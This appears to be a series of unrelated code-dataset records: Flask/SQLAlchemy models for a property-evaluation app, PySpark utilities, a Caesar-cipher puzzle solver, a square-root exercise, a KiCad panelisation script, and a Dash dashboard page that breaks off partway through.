db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String)\n market_area_type = db.Column(db.String) # Area, County, or EntireMarketArea\n market_area_id = db.Column(db.Integer, db.ForeignKey('area.id'), nullable=True)\n market_area = db.relationship('Area', uselist=False, lazy='subquery')\n market_area_county_id = db.Column(db.Integer, db.ForeignKey('county.id'), nullable=True)\n market_area_county = db.relationship('County', uselist=False, lazy='subquery')\n current_listing = db.Column(db.Boolean)\n current_listing_price = db.Column(db.Integer)\n property_sold_last_three_years = db.Column(db.Boolean)\n sale_price_string = db.Column(db.String)\n sale_price = db.Column(db.Integer)\n date_sold = db.Column(db.DateTime)\n current_use = db.Column(db.String)\n highest_and_best_use = db.Column(db.String)\n marketing_exposure_time = db.Column(db.String)\n land_assessment_tax_assessor = db.Column(db.Integer)\n building_assessment_tax_assessor = db.Column(db.Integer)\n owner = db.Column(db.String)\n property_address_id = db.Column(db.Integer, db.ForeignKey('address.id'))\n property_address = db.relationship('Address', uselist=False, lazy='subquery')\n map_parcel_number = db.Column(db.String)\n legal_physical_access = db.Column(db.Boolean)\n zoning = db.Column(db.String)\n utilities = db.Column(db.String)\n sewer = db.Column(db.String)\n gas = db.Column(db.String)\n power = db.Column(db.String)\n property_rights = db.Column(db.String)\n property_type = db.Column(db.String)\n tillable = db.Column(db.Float)\n non_tillable = db.Column(db.Float)\n irrigation_percentage = db.Column(db.Float)\n acres = db.Column(db.Float)\n evaluator = db.Column(db.String)\n date_of_inspection = db.Column(db.DateTime)\n property_rating_id = db.Column(db.Integer, db.ForeignKey('property_rating.id'))\n property_rating = db.relationship('PropertyRating', uselist=False, lazy='subquery')\n statistical_parameters_id = db.Column(db.Integer, db.ForeignKey('statistical_parameters.id'))\n 
statistical_parameters = db.relationship('StatisticalParameters', uselist=False, lazy='subquery')\n max = db.Column(db.Float)\n mod_max = db.Column(db.Float)\n mod_min_max = db.Column(db.Float)\n min = db.Column(db.Float)\n mod_min = db.Column(db.Float)\n stnd_deviation = db.Column(db.Float)\n median = db.Column(db.Float)\n sqrt_data_count = db.Column(db.Float)\n stnd_error = db.Column(db.Float)\n total_data_points_property = db.Column(db.Integer)\n num_properties_before_cal = db.Column(db.Integer)\n average = db.Column(db.Float)\n multiplier = db.Column(db.Float)\n value_unit_concluded = db.Column(db.Float)\n reconciled_per_unit = db.Column(db.Float)\n pdf = db.Column(db.String)\n market_trend_graph_id = db.Column(db.Integer, db.ForeignKey('market_trend_graph.id'))\n market_trend_graph = db.relationship('MarketTrendGraph', uselist=False, lazy='subquery')\n org_id = db.Column(db.Integer, db.ForeignKey('organization.id'))\n organization = db.relationship('Organization', uselist=False, lazy='subquery', backref=db.backref('evaluations', lazy='dynamic'))\n pdf_images_id = db.Column(db.Integer, db.ForeignKey('pdf_images.id'))\n pdf_images = db.relationship('PDFImages', uselist=False, lazy='subquery')\n improvements_id = db.Column(db.Integer, db.ForeignKey('improvements.id'))\n improvements = db.relationship('Improvements', uselist=False, lazy='subquery')\n custom_certification = db.Column(db.String)\n did_you_physically_inspect_property = db.Column(db.Boolean)\n tax_overhead_notes = db.Column(db.String)\n additional_exhibits_notes = db.Column(db.String)\n soils_notes = db.Column(db.String)\n flood_map_notes= db.Column(db.String)\n\n createdAt = db.Column(db.DateTime, nullable=False)\n updatedAt = db.Column(db.DateTime, nullable=False)\n\n def __init__(self, **kwargs):\n super(Evaluation, self).__init__(**kwargs)\n self.createdAt = datetime.now()\n self.updatedAt = datetime.now()\n\n def save(self):\n self.updatedAt = datetime.now()\n db.session.add(self)\n db.session.commit()\n \n @property\n def small_serialize(self):\n return {\n 'id': self.id,\n 'improvements': self.improvements.serialize if self.improvements is not None else None,\n 'valueUnitConcluded': self.value_unit_concluded,\n 'mapParcelNumber': self.map_parcel_number,\n 'name': self.name,\n 'propertyAddress': self.property_address.serialize if self.property_address is not None else None,\n 'reconciledPerUnit': self.reconciled_per_unit,\n 'updatedAt': self.updatedAt,\n 'pdf': self.pdf\n }\n\n @property\n def serialize(self):\n return {\n 'id': self.id,\n 'name': self.name,\n 'marketAreaType': self.market_area_type,\n 'marketArea': self.market_area.serialize if self.market_area_type == 'Area' else\n self.market_area_county.serialize if self.market_area_type == 'County' else '',\n 'currentListing': self.current_listing,\n 'currentListingPrice': self.current_listing_price,\n 'propertySoldLastThreeYears': self.property_sold_last_three_years,\n 'salePriceString': self.sale_price_string,\n 'salePrice': self.sale_price,\n 'dateSold': self.date_sold,\n 'currentUse': self.current_use,\n 'highestAndBestUse': self.highest_and_best_use,\n 'marketingExposureTime': self.marketing_exposure_time,\n 'landAssessmentTaxAssessor': self.land_assessment_tax_assessor,\n 'buildingAssessmentTaxAssessor': self.building_assessment_tax_assessor,\n 'owner': self.owner,\n 'propertyAddress': self.property_address.serialize,\n 'mapParcelNumber': self.map_parcel_number,\n 'legalPhysicalAccess': self.legal_physical_access,\n 'zoning': self.zoning,\n 'utilities': 
self.utilities,\n 'sewer': self.sewer,\n 'gas': self.gas,\n 'power': self.power,\n 'propertyRights': self.property_rights,\n 'propertyType': self.property_type,\n 'tillable': self.tillable,\n 'nonTillable': self.non_tillable,\n 'irrigationPercentage': self.irrigation_percentage,\n 'acres': self.acres,\n 'evaluator': self.evaluator,\n 'dateOfInspection': self.date_of_inspection,\n 'propertyRating': self.property_rating.serialize,\n 'statisticalParameters': self.statistical_parameters.serialize,\n 'max': self.max,\n 'modMax': self.mod_max,\n 'modMinMax': self.mod_min_max,\n 'min': self.min,\n 'modMin': self.mod_min,\n 'stndDeviation': self.stnd_deviation,\n 'median': self.median,\n 'sqrtDataCount': self.sqrt_data_count,\n 'stndError': self.stnd_error,\n 'totalDataPointsProperty': self.total_data_points_property,\n 'numPropertiesBeforeCal': self.num_properties_before_cal,\n 'average': self.average,\n 'multiplier': self.multiplier,\n 'valueUnitConcluded': self.value_unit_concluded,\n 'reconciledPerUnit': self.reconciled_per_unit,\n 'pdf': self.pdf,\n 'marketTrendGraph': self.market_trend_graph.serialize,\n 'orgId': self.org_id,\n 'pdfImages': self.pdf_images.serialize if self.pdf_images is not None else None,\n 'improvements': self.improvements.serialize if self.improvements is not None else None,\n 'customCertification': self.custom_certification,\n 'didYouPhysicallyInspectProperty': self.did_you_physically_inspect_property,\n 'taxOverheadNotes': self.tax_overhead_notes,\n 'additionalExhibitsNotes': self.additional_exhibits_notes,\n 'soilsNotes': self.soils_notes,\n 'floodMapNotes': self.flood_map_notes,\n 'createdAt': self.createdAt,\n 'updatedAt': self.updatedAt\n }\n\n\nclass PropertyRating(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n road_frontage = db.Column(db.Integer)\n access_frontage_easement = db.Column(db.Integer)\n access_ingress_egress_quality = db.Column(db.Integer)\n contiguous_parcels = db.Column(db.Integer)\n topography = db.Column(db.Integer)\n soils = db.Column(db.Integer)\n drainage = db.Column(db.Integer)\n # irrigation = db.Column(db.Integer)\n # rivers_creeks_ponds = db.Column(db.Integer)\n # marketable_timber = db.Column(db.Integer)\n additional_field_1 = db.Column(db.String)\n additional_field_2 = db.Column(db.String)\n additional_field_3 = db.Column(db.String)\n tillable = db.Column(db.Float)\n non_tillable = db.Column(db.Float)\n irrigation_percentage = db.Column(db.Float)\n blended_result = db.Column(db.Float)\n total_subject_score = db.Column(db.Integer)\n percentage_above_below = db.Column(db.Float)\n reconciled_overall_rating = db.Column(db.String)\n\n createdAt = db.Column(db.DateTime, nullable=False)\n updatedAt = db.Column(db.DateTime, nullable=False)\n\n def __init__(self, **kwargs):\n super(PropertyRating, self).__init__(**kwargs)\n self.createdAt = datetime.now()\n self.updatedAt = datetime.now()\n\n def save(self):\n self.updatedAt = datetime.now()\n db.session.add(self)\n db.session.commit()\n\n @property\n def serialize(self):\n return {\n 'id': self.id,\n 'roadFrontage': self.road_frontage,\n 'accessFrontageEasement': self.access_frontage_easement,\n 'accessIngressEgressQuality': self.access_ingress_egress_quality,\n 'contiguousParcels': self.contiguous_parcels,\n 'topography': self.topography,\n 'soils': self.soils,\n 'drainage': self.drainage,\n 'additionalField1': json.loads(self.additional_field_1) if self.additional_field_1 is not None else None,\n 'additionalField2': json.loads(self.additional_field_2) if self.additional_field_2 is 
not None else None,\n 'additionalField3': json.loads(self.additional_field_3) if self.additional_field_3 is not None else None,\n 'tillable': self.tillable,\n 'nonTillable': self.non_tillable,\n 'irrigationPercentage': self.irrigation_percentage,\n 'blendedResult': self.blended_result,\n 'totalSubjectScore': self.total_subject_score,\n 'percentageAboveBelow': self.percentage_above_below,\n 'reconciledOverallRating': self.reconciled_overall_rating\n }\n\n\nclass StatisticalParameters(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n acreage_min = db.Column(db.Float)\n acreage_max = db.Column(db.Float)\n date_of_sale_min = db.Column(db.DateTime)\n date_of_sale_max = db.Column(db.DateTime)\n outlier_percentage_exclusion = db.Column(db.Float)\n\n createdAt = db.Column(db.DateTime, nullable=False)\n updatedAt = db.Column(db.DateTime, nullable=False)\n\n def __init__(self, **kwargs):\n super(StatisticalParameters, self).__init__(**kwargs)\n self.createdAt = datetime.now()\n self.updatedAt = datetime.now()\n\n def save(self):\n self.updatedAt = datetime.now()\n db.session.add(self)\n db.session.commit()\n\n @property\n def serialize(self):\n return {\n 'id': self.id,\n 'acreageMin': self.acreage_min,\n 'acreageMax': self.acreage_max,\n 'dateOfSaleMin': self.date_of_sale_min,\n 'dateOfSaleMax': self.date_of_sale_max,\n 'outlierPercentageExclusion': self.outlier_percentage_exclusion\n }\n\n\nclass MarketTrendGraph(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n scatter_data = db.Column(db.String)\n trend_data = db.Column(db.String)\n m = db.Column(db.Float)\n b = db.Column(db.Float)\n R2 = db.Column(db.Float)\n\n updatedAt = db.Column(db.DateTime)\n createdAt = db.Column(db.DateTime)\n\n def __init__(self, **kwargs):\n super(MarketTrendGraph, self).__init__(**kwargs)\n self.createdAt = datetime.now()\n self.updatedAt = datetime.now()\n\n def save(self):\n self.updatedAt = datetime.now()\n db.session.add(self)\n db.session.commit()\n\n @property\n def serialize(self):\n return {\n 'id': self.id,\n 'scatterData': self.scatter_data,\n 'trendData': self.trend_data,\n 'm': self.m,\n 'b': self.b,\n 'R2': self.R2\n }\n\n\nclass PDFImages(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n property_pictures = db.Column(db.String)\n additional_exhibits = db.Column(db.String)\n signature = db.Column(db.String)\n # property_picture_1 = db.Column(db.LargeBinary)\n # property_picture_1_file_name = db.Column(db.String)\n # property_picture_1_file_type = db.Column(db.String)\n # property_picture_2 = db.Column(db.LargeBinary)\n # property_picture_2_file_name = db.Column(db.String)\n # property_picture_2_file_type = db.Column(db.String)\n # property_picture_3 = db.Column(db.LargeBinary)\n # property_picture_3_file_name = db.Column(db.String)\n # property_picture_3_file_type = db.Column(db.String)\n # signature_binary = db.Column(db.LargeBinary)\n # signature_file_type = db.Column(db.String)\n # signature_file_name = db.Column(db.String)\n # additional_exhibit_1_page_name = db.Column(db.String)\n # additional_exhibit_1 = db.Column(db.LargeBinary)\n # additional_exhibit_1_file_name = db.Column(db.String)\n # additional_exhibit_1_file_type = db.Column(db.String)\n # additional_exhibit_2_page_name = db.Column(db.String)\n # additional_exhibit_2 = db.Column(db.LargeBinary)\n # additional_exhibit_2_file_name = db.Column(db.String)\n # additional_exhibit_2_file_type = db.Column(db.String)\n # additional_exhibit_3_page_name = db.Column(db.String)\n # additional_exhibit_3 = 
db.Column(db.LargeBinary)\n # additional_exhibit_3_file_name = db.Column(db.String)\n # additional_exhibit_3_file_type = db.Column(db.String)\n\n updatedAt = db.Column(db.DateTime, nullable=False)\n createdAt = db.Column(db.DateTime, nullable=False)\n\n def __init__(self, **kwargs):\n super(PDFImages, self).__init__(**kwargs)\n self.createdAt = datetime.now()\n self.updatedAt = datetime.now()\n\n def save(self):\n self.updatedAt = datetime.now()\n db.session.add(self)\n db.session.commit()\n\n @property\n def serialize(self):\n # property_pictures_json = []\n # additional_exhibits_json = []\n # for x in range(1, 4):\n # prop_name = 'property_picture_' + str(x)\n # if hasattr(self, prop_name) and getattr(self, prop_name) is not None: # Check if it is None as well.\n # property_pictures_json.append({\n # 'fileURI': getattr(self, prop_name + '_file_type') + ',' + str(base64.b64encode(getattr(self, prop_name)), 'utf-8'), \n # 'file': {'name': getattr(self, prop_name + '_file_name')}, \n # 'fileName': getattr(self, prop_name + '_file_name')})\n # additional_name = 'additional_exhibit_' + str(x)\n # if hasattr(self, additional_name) and getattr(self, additional_name) is not None:\n # additional_exhibits_json.append({\n # 'pageName': getattr(self, additional_name+'_page_name'),\n # 'fileURI': getattr(self, additional_name + '_file_type') + ',' + str(base64.b64encode(getattr(self, additional_name)), 'utf-8'),\n # 'file': {'name': getattr(self, additional_name + '_file_name')},\n # 'fileName': getattr(self, additional_name + '_file_name')\n # })\n # signature_json = {\n # 'fileURI': self.signature_file_type + ',' + str(base64.b64encode(self.signature_binary), 'utf-8'),\n # 'file': {'nane': self.signature_file_name},\n # 'fileName': self.signature_file_name\n # } if self.signature_binary is not None else None\n \n return {\n 'id': self.id,\n 'propertyPictures': json.loads(self.property_pictures) if self.property_pictures is not None else None,\n 'additionalExhibits': json.loads(self.additional_exhibits) if self.additional_exhibits is not None else None,\n 'signature': json.loads(self.signature) if self.signature is not None else None\n }\n\n\nclass Improvements(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n total_improvements_value = db.Column(db.Float)\n improvements = db.Column(db.String)\n\n updatedAt = db.Column(db.DateTime, nullable=False)\n createdAt = db.Column(db.DateTime, nullable=False)\n\n def __init__(self, **kwargs):\n super(Improvements, self).__init__(**kwargs)\n self.createdAt = datetime.now()\n self.updatedAt = datetime.now()\n\n def save(self):\n self.updatedAt = datetime.now()\n db.session.add(self)\n db.session.commit()\n\n @property\n def serialize(self):\n return {\n 'id': self.id,\n 'totalImprovementsValue': self.total_improvements_value,\n 'improvements': json.loads(self.improvements) if self.improvements is not None else None\n }\n\n\nclass EvaluationSaveLog(db.Model):\n ### This is meant to capture saves/updates to an Evaluation that meet the business logic for a charge.\n ### Business Logic:\n ### 1. The Evaluation gets a PDF for the first time. (So basically the first time that they clicked\n ## Save & Download Eval)\n ### 2. The evaluation already has or has had a PDF attached to it and Evaluation name changes and\n ### then they proceed to Save & Download an Evaluation. (I will need to make sure that it is\n ### communicated to the client via the web app that Changing the name and downloading a PDF will count towards a charge)\n ### 3. 
The evaluation already has or has had a PDF attached to it and the address changes and\n ### they proceed to Save & Download an Evaluation.\n\n id = db.Column(db.Integer, primary_key=True)\n eval_id = db.Column(db.Integer, db.ForeignKey('evaluation.id'), nullable=True)\n evaluation = db.relationship('Evaluation', uselist=False, lazy='subquery', backref=db.backref('evaluation_save_logs', lazy='dynamic'))\n eval_id_perm = db.Column(db.Integer, nullable=True)\n user_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)\n user = db.relationship('User', uselist=False, lazy='subquery', backref=db.backref('evaluation_save_logs', lazy='dynamic'))\n timestamp = db.Column(db.DateTime, nullable=False)\n save_criteria = db.Column(db.String, nullable=True) # don't know If I will use this, but just in case.\n exempted = db.Column(db.Boolean, nullable=False)\n org_id = db.Column(db.Integer, db.ForeignKey('organization.id'), nullable=False)\n organization = db.relationship('Organization', uselist=False, lazy='subquery', backref=db.backref('evaluation_save_logs', lazy='dynamic'))\n has_pdf = db.Column(db.Boolean, nullable=False) # Couldn't think of a better name. If an Eval meets the valid critera, but doesn't have a pdf\n # set this field to False. This will help me if someone saves an Eval that meets the criteria, but doesn't have a PDF\n # then at a later date/time downloads a PDF with a change that doesn't meet critera. Technically since their last PDF download,\n # It will have changed, but I wouldn't say the change on the actual download.\n\n updatedAt = db.Column(db.DateTime, nullable=False)\n createdAt = db.Column(db.DateTime, nullable=False)\n\n def __init__(self, **kwargs):\n super(EvaluationSaveLog, self).__init__(**kwargs)\n self.exempted = False\n self.timestamp = datetime.now()\n self.createdAt = datetime.now()\n self.updatedAt = datetime.now()\n\n def save(self):\n self.updatedAt = datetime.now()\n db.session.add(self)\n db.session.commit()\n\n @property\n def serialize(self):\n return {\n 'id': self.id,\n 'user': self.user.serialize,\n 'timestamp': self.timestamp,\n 'saveCriteria': self.save_criteria,\n 'exempted': self.exempted,\n 'has_pdf': self.has_pdf,\n 'evaluation': {\n 'id': self.evaluation.id if self.evaluation is not None else None\n },\n 'evalId': self.eval_id_perm\n }\n","repo_name":"dk-extdev/react_sass_flask_evaluation","sub_path":"models/Evaluation.py","file_name":"Evaluation.py","file_ext":"py","file_size_in_byte":20878,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"22601510881","text":"from argparse import ArgumentParser, Namespace\nimport sys\nfrom pyspark import SparkConf, SparkContext\nfrom pyspark.sql import SparkSession\nfrom pathlib import Path\nfrom typing import Any\n\n\ndef unzip_packages():\n from zipfile import ZipFile\n from os import getcwd\n\n cur_dir = getcwd()\n with ZipFile(f'{cur_dir}/packages.zip', mode='r') as ar:\n ar.extractall()\n\n\nclass Log4j:\n def __init__(self, spark: SparkSession):\n conf = spark.sparkContext.getConf()\n app_id = conf.get('spark.app.id')\n app_name = conf.get('spark.app.name')\n\n log4j = spark._jvm.org.apache.log4j\n message_prefix = '<' + app_name + ' ' + app_id + '>'\n self.logger = log4j.LogManager.getLogger(message_prefix)\n\n def error(self, message: str):\n self.logger.error(message)\n\n def warn(self, message: str):\n self.logger.warn(message)\n\n def info(self, message: str):\n self.logger.info(message)\n\n\ndef start_spark(\n app_name: 
str,\n master: str = None,\n config: SparkConf = None,\n instance: str = None,\n enable_unzip: bool = False,\n enable_hive_support: bool = False,\n) -> SparkSession:\n\n spark_builder = (\n SparkSession\n .builder\n .appName(app_name)\n )\n\n # when remote spark can't find modules in packages.zip\n # if enable_unzip:\n # unzip_packages()\n\n if instance == 'remote_spark_shell':\n from src.connection.envs import envs\n envs = envs()\n\n\n # pkg = [\"io.delta:delta-core_2.12:2.3.0\"]\n conf = [\n # # (\"spark.sql.extensions\", \"io.delta.sql.DeltaSparkSessionExtension\"),\n # # (\"spark.sql.catalog.spark_catalog\", \"org.apache.spark.sql.delta.catalog.DeltaCatalog\"),\n # # (\"spark.sql.legacy.createHiveTableByDefault.enabled\", \"true\"),\n # # (\"spark.master\", \"cluster\"),\n # (\"spark.sql.uris\", f\"thrift://{envs['HADOOP_SERV']}:9083\"),\n # (\"hive.metastore.uris\", f\"thrift://{envs['HADOOP_SERV']}:9083\"),\n (\"spark.sql.warehouse.dir\", f\"hdfs://{envs['HADOOP_SERV']}:9000{envs['HIVE_WH']}\"),\n # ('spark.sql.catalogImplementation', 'hive'),\n # ('spark.shell.deployMode', 'cluster'),\n # ('spark.jars.packages', 'io.delta:delta-core_2.12:2.3.0'),\n ]\n\n conf = SparkConf().setAll(conf)\n spark_builder = spark_builder.config(conf=conf)\n\n from delta.pip_utils import configure_spark_with_delta_pip\n spark_builder = configure_spark_with_delta_pip(spark_builder)\n\n if enable_hive_support:\n spark_builder = spark_builder.enableHiveSupport()\n\n if config:\n spark_builder = spark_builder.config(conf=config)\n\n if master:\n spark_builder = spark_builder.master(master)\n\n spark = spark_builder.getOrCreate()\n\n return spark\n\n\ndef get_spark_logger(spark: SparkSession) -> Log4j:\n spark_logger = Log4j(spark)\n\n spark_logger.info(\"command line args\" + str(sys.argv))\n spark_logger.info(\"Spark session created\")\n\n return spark_logger\n\n\ndef get_folder_content(spark: SparkSession, path: str) -> list:\n sc = spark.sparkContext\n hadoop = sc._jvm.org.apache.hadoop\n fs = hadoop.fs.FileSystem\n conf = hadoop.conf.Configuration()\n hadoop_path = hadoop.fs.Path(path)\n content = [Path(str(f.getPath())).name for f in fs.get(conf).listStatus(hadoop_path)]\n return content\n\n\nclass ArgsBuilder:\n def __init__(self, description: str = ''):\n self._parser = ArgumentParser(description=description)\n\n def with_arg(self, name: str, type: Any, **kwargs):\n self._parser.add_argument(name, type=type, **kwargs)\n return self\n\n def build(self) -> Namespace:\n return self._parser.parse_args()\n\n\ndef get_hdfs_folder_content(sc: SparkContext, path: str) -> list:\n hadoop = sc._jvm.org.apache.hadoop\n fs = hadoop.fs.FileSystem\n conf = hadoop.conf.Configuration()\n path = hadoop.fs.Path(path)\n\n content = [Path(str(f.getPath())).name for f in fs.get(conf).listStatus(path)]\n return content\n\n\ndef read_sql_file(path: str) -> str:\n with open(path) as file:\n sql = file.read()\n return sql\n","repo_name":"Megacinder/spot","sub_path":"src/spark/spark_utils.py","file_name":"spark_utils.py","file_ext":"py","file_size_in_byte":4155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"22029452652","text":"class DistObj:\n def __init__(self, aname):\n self.name = aname\n self.url = ''\n self.description = ''\n self.protocol = ''\n self.appprofile = ''\n self.functioncode = ''\n self.functiontext = ''\n self.distorg = ''\n self.formatlist = []\n\n def dump(self):\n return {\"adistobj\": {'name': self.name,\n 'url': self.url,\n 'description': 
self.description,\n                             'protocol': self.protocol,\n                             'appprofile': self.appprofile,\n                             'functioncode': self.functioncode,\n                             'functiontext': self.functiontext,\n                             'distorg': self.distorg,\n                             'formatlist': self.formatlist\n                             }}","repo_name":"ShutongLi/cinergi_dispatch_dev","sub_path":"cinergy_with_lib/Distribution.py","file_name":"Distribution.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"6152260342","text":"'''\nsimple caesar decryption\ncaesar encryption is based on a rotation operation.\nthe function takes n and encryptedText as parameters.\nn is the rotation index, encryptedText is the Caesar-encrypted text\nthe decryption formula is\nD(x) = (x - n) % 26\n26 is the number of letters in the British alphabet\nx is a letter of the encrypted text\nn is the rotation value.\nCreated on 21 Aug 2017\n@author: FIRAT\n'''\nimport string\nletters = string.ascii_letters\ndef caesar_decryption(n, encryptedText):\n    predictedText = ''\n    for letter in encryptedText:\n        currentIndex = letters.index(letter)\n        predictedIndex = (currentIndex - n) % 26\n        predictedLetter = letters[predictedIndex]\n        predictedText = predictedText + predictedLetter\n    return predictedText\n\nfor i in range(26):\n    print('CASE = ' + str(i))\n    print(caesar_decryption(i, 'SYNTPrfneVfPbbyOhgAbgFrpher'))","repo_name":"firatpayalan/ringzer0challenges","sub_path":"cryptography/some_martian_message.py","file_name":"some_martian_message.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"9087889626","text":"import math\nclass Solution:\n    def mySqrt(self, x: int) -> int:\n        return math.floor(self.findSqrt(0, x, x))\n    \n    def findSqrt(self, start: float, end: float, x: int) -> float:\n        if (end == 1 or end == 0):\n            return end\n        mid = (start + end) / 2\n        square = mid * mid\n        if int(round(square, 6)) == round(x, 6):\n            return mid\n        elif (square > x):\n            return self.findSqrt(start, mid, x)\n        else:\n            return self.findSqrt(mid, end, x)\n    \n    def runtests(self):\n        if (self.mySqrt(1) == 1 and self.mySqrt(0) == 0 and self.mySqrt(8) == 2 and self.mySqrt(100) == 10 \\\n            and self.mySqrt(9) == 3 and self.mySqrt(16) == 4):\n            print(True)\n        else:\n            print(False)\n        \nsol = Solution()\nsol.runtests()","repo_name":"dhrumil-shah/leetcode-python","sub_path":"69-Sqrt(x).py","file_name":"69-Sqrt(x).py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"26168041859","text":"from kikit import panelize\nimport shapely\nimport pcbnew\nimport sys\n\ntabWidth = panelize.fromMm(65)\nslotWidth = panelize.fromMm(2.5)\npanelOrigin = pcbnew.wxPointMM(150, 40)\n\npanel = panelize.Panel()\n\npos1 = panel.appendBoard(sys.argv[1], panelOrigin - pcbnew.wxPointMM(1.5, 0),\n                         origin=panelize.Origin.TopRight, tolerance=panelize.fromMm(5))\npos2 = panel.appendBoard(sys.argv[1], panelOrigin + pcbnew.wxPointMM(1.5, 0),\n                         origin=panelize.Origin.BottomRight, tolerance=panelize.fromMm(5),\n                         rotationAngle=1800)\n\ntabs, cuts = panel.layerToTabs(\"Cmts.User\", panelize.fromMm(5))\npanel.appendSubstrate(tabs)\npanel.addMillFillets(panelize.fromMm(1))\n\npanel.makeMouseBites(cuts, panelize.fromMm(0.5), 
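# hedged note: assuming KiKit's documented makeMouseBites(cuts, diameter, spacing) argument order,\n# the two lengths here drill 0.5 mm mouse-bite holes spaced 0.75 mm apart along the tab cuts.\n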
panelize.fromMm(0.75))\n\npanel.save(sys.argv[2])\n","repo_name":"RoboticsBrno/RB0002-BatteryPack","sub_path":"scripts/panelizeBattery.py","file_name":"panelizeBattery.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"67"} +{"seq_id":"6221648957","text":"import networkx # type: ignore\nfrom graph_helper.distance import distance # type: ignore\n\nfrom itertools import product, combinations\nfrom typing import Optional\nimport random\n\n\ndef square_subgraph(\n side_length: int,\n num_nodes: int,\n num_targets: Optional[int] = None,\n node_att: Optional[dict] = None,\n node_seed: int = 13,\n param_seed: int = 13,\n taxicab: bool = True,\n blind: bool = False,\n) -> networkx.DiGraph:\n \"\"\"Square Subgraph\n The graph nodes are randomly chosen points of grid of size ‹side_length› ⨉ ‹side_length›.\n ‹num_nodes› nodes are chosen. The graph edges are computed in the taxicab distance metric by\n default. Euclidean metric is set by ‹taxicab=False›.\n\n Args:\n Side Length - side_length: side length of the original grid\n Number of nodes - num_nodes: number of the chosen nodes\n Number of Targets - num_targets: number of targets ( <= num_nodes; if None, it equals to num_nodes)\n Node Attributes - node_att: optional attributes updating the default values\n Node RNG seed - node_seed: the seed for the random generator - for nodes\n Parameter RNG seed - param_seed: the seed for the random generator - for parameters\n Use taxicab - taxicab: usage of taxicab or Euclidean metric\n Random node blindness - blind: True for random blindness in nodes\n \n Returns:\n Graph: The generated networkx graph\n\n Backward compatibility:\n Sub_g_6_n_01.in is generated by square_subgraph(6, 10, node_seed=1)\n \"\"\"\n # safety check\n if not (1 <= num_nodes <= side_length * side_length):\n raise AttributeError(\n f\"Error: wrong value for parameter num_nodes, \"\n f\"not (1 <= {num_nodes} <= {side_length * side_length}).\"\n )\n\n if num_targets is None:\n num_targets = num_nodes\n\n if num_nodes < num_targets:\n raise AttributeError(\n f\"Error: wrong value for parameter num_targets, not ({num_targets} <= {num_nodes}).\"\n )\n\n # choose the nodes\n pool = [edge for edge in product(range(side_length), repeat=2)]\n random.seed(node_seed)\n random.shuffle(pool)\n chosen_nodes = pool[:num_nodes]\n chosen_targets = chosen_nodes[:num_targets]\n chosen_nodes.sort()\n\n # compute distances/edges\n edges_dist = [\n distance(*edge, taxicab=taxicab) for edge in combinations(chosen_nodes, 2)\n ]\n\n # edge-length statistics\n max_edge = max(edges_dist)\n mean_edge = sum(edges_dist) / len(edges_dist)\n attack_time = (\n int(max_edge + mean_edge + 3) if taxicab else int(2 * max_edge + mean_edge)\n )\n\n random.seed(param_seed)\n\n nodes = []\n for node in chosen_nodes:\n node_attributes = dict(\n value=random.randint(180, 200),\n attack_len=attack_time,\n blindness=random.randint(0, 20) / 100 if blind else 0,\n memory=4,\n target=(node in chosen_targets),\n )\n node_attributes.update(node_att or {})\n nodes.append((node, node_attributes))\n\n edges = []\n for edge, dist in zip(combinations(chosen_nodes, 2), edges_dist):\n edges.append((*edge, dict(len=dist)))\n\n graph = networkx.Graph()\n graph.add_nodes_from(nodes)\n graph.add_edges_from(edges)\n graph = graph.to_directed()\n graph.name = f\"square_subgraph_s{side_length}_n{num_nodes}_t{num_targets}\"\n\n return 
graph\n","repo_name":"pitris90/map_editor","sub_path":"graph_templates/square_subgraph.py","file_name":"square_subgraph.py","file_ext":"py","file_size_in_byte":3424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"38133600397","text":"import dash\nfrom dash import html\nfrom dash import dcc\nfrom dash.dependencies import Input, Output\nimport dash_bootstrap_components as dbc\n\nimport pandas as pd\n\nfrom data.query import get_dash_dataframe\n\ndash.register_page(__name__)\n\ndf_temp_raw, df_routes_raw = get_dash_dataframe('trips')\ndf_temp = df_temp_raw.reset_index(drop=True)\ndf_routes = df_routes_raw.loc[df_routes_raw['record_id'] == df_routes_raw['record_id'].max()].reset_index(drop=True)\n\ncss_dict_h2 = {\n 'height': '15%', \n 'textAlign': 'center',\n 'display': 'flex',\n 'alignItems': 'center',\n 'justifyContent': 'center',\n 'marginTop': '80px'\n}\n\ncss_dict_h4 = {\n 'textAlign': 'center',\n 'display': 'flex',\n 'alignItems': 'center',\n 'justifyContent': 'center',\n 'marginTop': '0'\n}\n\ncss_dict_card = {\n 'backgroundColor': 'white',\n 'height': '100%',\n 'width': '100%',\n 'margin': '0',\n 'padding': '0'\n}\n\ndef create_location_layout(id_prefix, default_value, css_h2_pattern=None, css_h4_pattern=None,css_card_pattern=None):\n return dbc.Card([\n dcc.Dropdown(\n id=f'{id_prefix}-location-dropdown',\n options=[{'label': origin, 'value': origin} for origin in df_routes['origin'].unique()],\n value=default_value,\n style={'width': '100%'}\n ),\n html.H1(id=f'{id_prefix}-location-name', children=default_value, style={'textAlign': 'center', 'display': 'flex', 'alignItems': 'center', 'justifyContent': 'center'}),\n dbc.Row([\n dbc.Col([\n dbc.Card([\n html.H2(id=f'{id_prefix}-precip_mm', style=css_h2_pattern),\n html.H4('Precipitação (mm)', style=css_h4_pattern)\n ], body=True, style=css_card_pattern),\n ], style={'flex': '1'}),\n dbc.Col([\n dbc.Card([\n html.H2(id=f'{id_prefix}-humidity', 